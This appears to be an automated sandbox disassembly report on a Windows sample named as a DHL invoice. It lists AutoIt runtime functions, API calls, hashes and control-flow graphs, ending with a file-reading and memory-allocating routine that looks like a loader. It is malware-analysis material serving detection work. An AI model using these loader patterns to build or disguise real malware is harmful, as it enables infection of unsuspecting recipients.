                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2695905019-0
                                                                                                                        • Opcode ID: 38ae7f8485859a12ff871625180a61c1c8502668702c6c87eccabd0f816d2e6a
                                                                                                                        • Instruction ID: 5b66ef17c9aa3a1d7ebeb23661e918b28b261a40e82eddf5222d95b36d712c03
                                                                                                                        • Opcode Fuzzy Hash: 38ae7f8485859a12ff871625180a61c1c8502668702c6c87eccabd0f816d2e6a
                                                                                                                        • Instruction Fuzzy Hash: 9BF0A03082091057CA226B78EC0E8AA776C9E01334F144B02F83AC20E0EBB069558A95
                                                                                                                        Function 0033BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID: p#@
                                                                                                                        • API String ID: 3964851224-1673889715
                                                                                                                        • Opcode ID: 667b214466669678dcfc3ef169db81c89e521154844d0a90ed36f50b8f9c592a
                                                                                                                        • Instruction ID: 1fafbfc7ce4f8d816448757dc00fd0adf153c54e1969fb25d0886eae310f89fb
                                                                                                                        • Opcode Fuzzy Hash: 667b214466669678dcfc3ef169db81c89e521154844d0a90ed36f50b8f9c592a
                                                                                                                        • Instruction Fuzzy Hash: 54A279706083418FC756DF28C4C0B2ABBE5BF89304F15996DE89A9B352D771EC45CB92
                                                                                                                        Function 0033D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetInputState.USER32 ref: 0033D807
                                                                                                                        • timeGetTime.WINMM ref: 0033DA07
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0033DB28
                                                                                                                        • TranslateMessage.USER32(?), ref: 0033DB7B
                                                                                                                        • DispatchMessageW.USER32(?), ref: 0033DB89
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0033DB9F
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0033DBB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2189390790-0
                                                                                                                        • Opcode ID: a23eff23e54f52d537576a6b46a57a9328ff51bc7cf2377bd27ff9ed448511ef
                                                                                                                        • Instruction ID: 79df7216a669ff6a6eb20735f1b3d2cec8a6e5b36a757ccad92f430fbb3ecb02
                                                                                                                        • Opcode Fuzzy Hash: a23eff23e54f52d537576a6b46a57a9328ff51bc7cf2377bd27ff9ed448511ef
                                                                                                                        • Instruction Fuzzy Hash: D942D070608341EFD72BDF24D884FAAB7E5BF86304F1585A9F4568B2A1D770E844CB92
                                                                                                                        Function 0033344D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00333A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00401418,?,00332E7F,?,?,?,00000000), ref: 00333A78
                                                                                                                          • Part of subcall function 00333357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00333379
                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0033356A
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0037318D
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003731CE
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00373210
                                                                                                                        • _wcslen.LIBCMT ref: 00373277
                                                                                                                        • _wcslen.LIBCMT ref: 00373286
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$,
                                                                                                                        • API String ID: 98802146-1987284180
                                                                                                                        • Opcode ID: 454bcc716f1b054ca76c26da243897e721c9ffeba7b81ef4c1c19532dbe6f5f3
                                                                                                                        • Instruction ID: bad5da69b8f479994890d527d9a5898e3148165fe41895205e224268a54c6774
                                                                                                                        • Opcode Fuzzy Hash: 454bcc716f1b054ca76c26da243897e721c9ffeba7b81ef4c1c19532dbe6f5f3
                                                                                                                        • Instruction Fuzzy Hash: DF7191714043009EC316EF65DE8599BB7E8FF85340F40583EF949EB1A1DBB49A48CB55
                                                                                                                        Function 00332CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00332D07
                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00332D31
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00332D42
                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00332D5F
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00332D6F
                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00332D85
                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00332D94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                        • Opcode ID: 9b1c91bce20f481df113200419c43a87cae09849ee436dd80feb8d800f655328
                                                                                                                        • Instruction ID: abee9cb7ef13f2bde5fce441c5f821bba2b0dc48bf862b4628ddfd8a34d079ad
                                                                                                                        • Opcode Fuzzy Hash: 9b1c91bce20f481df113200419c43a87cae09849ee436dd80feb8d800f655328
                                                                                                                        • Instruction Fuzzy Hash: EA21A0B5911218AFDB019FA4E949B9DBBB8FB08700F00512AEA15F62A0D7B15544CF95
                                                                                                                        Function 00368D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 372 368d45-368d55 373 368d57-368d6a call 35f2c6 call 35f2d9 372->373 374 368d6f-368d71 372->374 388 3690f1 373->388 375 368d77-368d7d 374->375 376 3690d9-3690e6 call 35f2c6 call 35f2d9 374->376 375->376 380 368d83-368dae 375->380 394 3690ec call 3627ec 376->394 380->376 383 368db4-368dbd 380->383 386 368dd7-368dd9 383->386 387 368dbf-368dd2 call 35f2c6 call 35f2d9 383->387 391 3690d5-3690d7 386->391 392 368ddf-368de3 386->392 387->394 393 3690f4-3690f9 388->393 391->393 392->391 396 368de9-368ded 392->396 394->388 396->387 399 368def-368e06 396->399 400 368e23-368e2c 399->400 401 368e08-368e0b 399->401 405 368e2e-368e45 call 35f2c6 call 35f2d9 call 3627ec 400->405 406 368e4a-368e54 400->406 403 368e15-368e1e 401->403 404 368e0d-368e13 401->404 407 368ebf-368ed9 403->407 404->403 404->405 437 36900c 405->437 409 368e56-368e58 406->409 410 368e5b-368e79 call 363820 call 3629c8 * 2 406->410 412 368edf-368eef 407->412 413 368fad-368fb6 call 36f89b 407->413 409->410 441 368e96-368ebc call 369424 410->441 442 368e7b-368e91 call 35f2d9 call 35f2c6 410->442 412->413 417 368ef5-368ef7 412->417 426 368fb8-368fca 413->426 427 369029 413->427 417->413 422 368efd-368f23 417->422 422->413 423 368f29-368f3c 422->423 423->413 428 368f3e-368f40 423->428 426->427 432 368fcc-368fdb GetConsoleMode 426->432 430 36902d-369045 ReadFile 427->430 428->413 433 368f42-368f6d 428->433 435 369047-36904d 430->435 436 3690a1-3690ac GetLastError 430->436 432->427 438 368fdd-368fe1 432->438 433->413 440 368f6f-368f82 433->440 435->436 445 36904f 435->445 443 3690c5-3690c8 436->443 444 3690ae-3690c0 call 35f2d9 call 35f2c6 436->444 439 36900f-369019 call 3629c8 437->439 438->430 446 368fe3-368ffd ReadConsoleW 438->446 439->393 440->413 448 368f84-368f86 440->448 441->407 442->437 455 369005-36900b call 35f2a3 443->455 456 3690ce-3690d0 443->456 444->437 452 369052-369064 445->452 453 36901e-369027 446->453 454 368fff GetLastError 446->454 448->413 458 368f88-368fa8 448->458 452->439 462 369066-36906a 452->462 453->452 454->455 455->437 456->439 458->413 467 369083-36908e 462->467 468 36906c-36907c call 368a61 462->468 469 369090 call 368bb1 467->469 470 36909a-36909f call 3688a1 467->470 479 36907f-369081 468->479 477 369095-369098 469->477 470->477 477->479 479->439
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .5
                                                                                                                        • API String ID: 0-4279605997
                                                                                                                        • Opcode ID: 6e74fb9ef035ad728cab610ef64f8ca428c56f403ef154eba81718253c84b15a
                                                                                                                        • Instruction ID: d5c903947fd9e1a93b36358c201cc5ba80de059ce4d2226aa7d400276af59efd
                                                                                                                        • Opcode Fuzzy Hash: 6e74fb9ef035ad728cab610ef64f8ca428c56f403ef154eba81718253c84b15a
                                                                                                                        • Instruction Fuzzy Hash: A3C1F674D04249AFCF13DFA8D841BADBBB8AF0D310F05815AF815AB396CB719941CB61
                                                                                                                        Function 0037065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 480 37065b-37068b call 37042f 483 3706a6-3706b2 call 365221 480->483 484 37068d-370698 call 35f2c6 480->484 490 3706b4-3706c9 call 35f2c6 call 35f2d9 483->490 491 3706cb-370714 call 37039a 483->491 489 37069a-3706a1 call 35f2d9 484->489 500 37097d-370983 489->500 490->489 498 370716-37071f 491->498 499 370781-37078a GetFileType 491->499 502 370756-37077c GetLastError call 35f2a3 498->502 503 370721-370725 498->503 504 3707d3-3707d6 499->504 505 37078c-3707bd GetLastError call 35f2a3 CloseHandle 499->505 502->489 503->502 509 370727-370754 call 37039a 503->509 507 3707df-3707e5 504->507 508 3707d8-3707dd 504->508 505->489 519 3707c3-3707ce call 35f2d9 505->519 512 3707e9-370837 call 36516a 507->512 513 3707e7 507->513 508->512 509->499 509->502 522 370847-37086b call 37014d 512->522 523 370839-370845 call 3705ab 512->523 513->512 519->489 530 37087e-3708c1 522->530 531 37086d 522->531 523->522 529 37086f-370879 call 3686ae 523->529 529->500 532 3708c3-3708c7 530->532 533 3708e2-3708f0 530->533 531->529 532->533 536 3708c9-3708dd 532->536 537 3708f6-3708fa 533->537 538 37097b 533->538 536->533 537->538 539 3708fc-37092f CloseHandle call 37039a 537->539 538->500 542 370963-370977 539->542 543 370931-37095d GetLastError call 35f2a3 call 365333 539->543 542->538 543->542
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0037039A: CreateFileW.KERNELBASE(00000000,00000000,?,00370704,?,?,00000000,?,00370704,00000000,0000000C), ref: 003703B7
                                                                                                                        • GetLastError.KERNEL32 ref: 0037076F
                                                                                                                        • __dosmaperr.LIBCMT ref: 00370776
                                                                                                                        • GetFileType.KERNELBASE(00000000), ref: 00370782
                                                                                                                        • GetLastError.KERNEL32 ref: 0037078C
                                                                                                                        • __dosmaperr.LIBCMT ref: 00370795
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003707B5
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 003708FF
                                                                                                                        • GetLastError.KERNEL32 ref: 00370931
                                                                                                                        • __dosmaperr.LIBCMT ref: 00370938
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                        • Opcode ID: 5fb936d258de9a6b3f5542c0cca5b1fd16188ee310c7dd3c48718334ec422252
                                                                                                                        • Instruction ID: 8d460e997890fe5fb00a014edb5e071f0603a0f68850b1f0421615b5a415ce36
                                                                                                                        • Opcode Fuzzy Hash: 5fb936d258de9a6b3f5542c0cca5b1fd16188ee310c7dd3c48718334ec422252
                                                                                                                        • Instruction Fuzzy Hash: 8DA12836A101448FDF2E9F68D851BAD7BA0EB06320F14815DF859EF2A1CB399812CB91
                                                                                                                        Function 00332B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00332B8E
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00332B9D
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00332BB3
                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00332BC5
                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00332BD7
                                                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00332BEF
                                                                                                                        • RegisterClassExW.USER32(?), ref: 00332C40
                                                                                                                          • Part of subcall function 00332CD4: GetSysColorBrush.USER32(0000000F), ref: 00332D07
                                                                                                                          • Part of subcall function 00332CD4: RegisterClassExW.USER32(00000030), ref: 00332D31
                                                                                                                          • Part of subcall function 00332CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00332D42
                                                                                                                          • Part of subcall function 00332CD4: InitCommonControlsEx.COMCTL32(?), ref: 00332D5F
                                                                                                                          • Part of subcall function 00332CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00332D6F
                                                                                                                          • Part of subcall function 00332CD4: LoadIconW.USER32(000000A9), ref: 00332D85
                                                                                                                          • Part of subcall function 00332CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00332D94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                        • Opcode ID: 8b8d22b40dbfe2a97e003a17c687f075f1123f33b039a7f10c735cf3c5cea658
                                                                                                                        • Instruction ID: 05f6c6458baa9414931b0625720bfe8fe44a216d83bb908bfe56fb9465286d96
                                                                                                                        • Opcode Fuzzy Hash: 8b8d22b40dbfe2a97e003a17c687f075f1123f33b039a7f10c735cf3c5cea658
                                                                                                                        • Instruction Fuzzy Hash: A9213974E10314AFEB119FA5EE85AA97FF8FB08B50F04002AF905B66B0D3B11540CF98
                                                                                                                        Function 00333170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 551 333170-333185 552 333187-33318a 551->552 553 3331e5-3331e7 551->553 555 3331eb 552->555 556 33318c-333193 552->556 553->552 554 3331e9 553->554 557 3331d0-3331d8 DefWindowProcW 554->557 558 3331f1-3331f6 555->558 559 372dfb-372e23 call 3318e2 call 34e499 555->559 560 333265-33326d PostQuitMessage 556->560 561 333199-33319e 556->561 564 3331de-3331e4 557->564 566 3331f8-3331fb 558->566 567 33321d-333244 SetTimer RegisterWindowMessageW 558->567 594 372e28-372e2f 559->594 565 333219-33321b 560->565 562 3331a4-3331a8 561->562 563 372e7c-372e90 call 39bf30 561->563 570 3331ae-3331b3 562->570 571 372e68-372e72 call 39c161 562->571 563->565 588 372e96 563->588 565->564 574 333201-333214 KillTimer call 3330f2 call 333c50 566->574 575 372d9c-372d9f 566->575 567->565 572 333246-333251 CreatePopupMenu 567->572 577 372e4d-372e54 570->577 578 3331b9-3331be 570->578 584 372e77 571->584 572->565 574->565 580 372dd7-372df6 MoveWindow 575->580 581 372da1-372da5 575->581 577->557 591 372e5a-372e63 call 390ad7 577->591 586 333253-333263 call 33326f 578->586 587 3331c4-3331ca 578->587 580->565 589 372da7-372daa 581->589 590 372dc6-372dd2 SetFocus 581->590 584->565 586->565 587->557 587->594 588->557 589->587 595 372db0-372dc1 call 3318e2 589->595 590->565 591->557 594->557 599 372e35-372e48 call 3330f2 call 333837 594->599 595->565 599->557
                                                                                                                        APIs
                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0033316A,?,?), ref: 003331D8
                                                                                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,0033316A,?,?), ref: 00333204
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00333227
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0033316A,?,?), ref: 00333232
                                                                                                                        • CreatePopupMenu.USER32 ref: 00333246
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00333267
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                        • String ID: TaskbarCreated
                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                        • Opcode ID: 2b1d820ecbc0b495ee746997df2ee1f60f03504b98cfc280673e903667ece961
                                                                                                                        • Instruction ID: 084f7b5e9ee499d318918bc307d2bd6096fa448185630a604c94b4f376a00c80
                                                                                                                        • Opcode Fuzzy Hash: 2b1d820ecbc0b495ee746997df2ee1f60f03504b98cfc280673e903667ece961
                                                                                                                        • Instruction Fuzzy Hash: 04412831A50200ABEB272B78DE8DB7A365DE705340F04C135F91AEA5F1C779DA40D769
                                                                                                                        Function 0033DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D%@$D%@$D%@$D%@$D%@D%@$Variable must be of type 'Object'.
                                                                                                                        • API String ID: 0-3139565913
                                                                                                                        • Opcode ID: d045f8a9b090bf7fba90cf06b304379929541be4d3e9d43e125a8c7a68b75033
                                                                                                                        • Instruction ID: d7593252870f1e30f37c82007b4067dae0ad03437d1baf57de36024143c12fb1
                                                                                                                        • Opcode Fuzzy Hash: d045f8a9b090bf7fba90cf06b304379929541be4d3e9d43e125a8c7a68b75033
                                                                                                                        • Instruction Fuzzy Hash: C0C29875E00214CFCB26DFA8C8C0AADB7B1BF09710F258569E946AB3A1D375ED41CB91
                                                                                                                        Function 00EAF2D8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1117 eaf2d8-eaf386 call eacd08 1120 eaf38d-eaf3b3 call eb01e8 CreateFileW 1117->1120 1123 eaf3ba-eaf3ca 1120->1123 1124 eaf3b5 1120->1124 1129 eaf3cc 1123->1129 1130 eaf3d1-eaf3eb VirtualAlloc 1123->1130 1125 eaf505-eaf509 1124->1125 1127 eaf54b-eaf54e 1125->1127 1128 eaf50b-eaf50f 1125->1128 1131 eaf551-eaf558 1127->1131 1132 eaf51b-eaf51f 1128->1132 1133 eaf511-eaf514 1128->1133 1129->1125 1134 eaf3ed 1130->1134 1135 eaf3f2-eaf409 ReadFile 1130->1135 1136 eaf55a-eaf565 1131->1136 1137 eaf5ad-eaf5c2 1131->1137 1138 eaf52f-eaf533 1132->1138 1139 eaf521-eaf52b 1132->1139 1133->1132 1134->1125 1144 eaf40b 1135->1144 1145 eaf410-eaf450 VirtualAlloc 1135->1145 1146 eaf569-eaf575 1136->1146 1147 eaf567 1136->1147 1140 eaf5d2-eaf5da 1137->1140 1141 eaf5c4-eaf5cf VirtualFree 1137->1141 1142 eaf543 1138->1142 1143 eaf535-eaf53f 1138->1143 1139->1138 1141->1140 1142->1127 1143->1142 1144->1125 1148 eaf452 1145->1148 1149 eaf457-eaf472 call eb0438 1145->1149 1150 eaf589-eaf595 1146->1150 1151 eaf577-eaf587 1146->1151 1147->1137 1148->1125 1157 eaf47d-eaf487 1149->1157 1154 eaf5a2-eaf5a8 1150->1154 1155 eaf597-eaf5a0 1150->1155 1153 eaf5ab 1151->1153 1153->1131 1154->1153 1155->1153 1158 eaf4ba-eaf4ce call eb0248 1157->1158 1159 eaf489-eaf4b8 call eb0438 1157->1159 1165 eaf4d2-eaf4d6 1158->1165 1166 eaf4d0 1158->1166 1159->1157 1167 eaf4d8-eaf4dc CloseHandle 1165->1167 1168 eaf4e2-eaf4e6 1165->1168 1166->1125 1167->1168 1169 eaf4e8-eaf4f3 VirtualFree 1168->1169 1170 eaf4f6-eaf4ff 1168->1170 1169->1170 1170->1120 1170->1125
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EAF3A9
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EAF5CF
                                                                                                                        Memory Dump Source
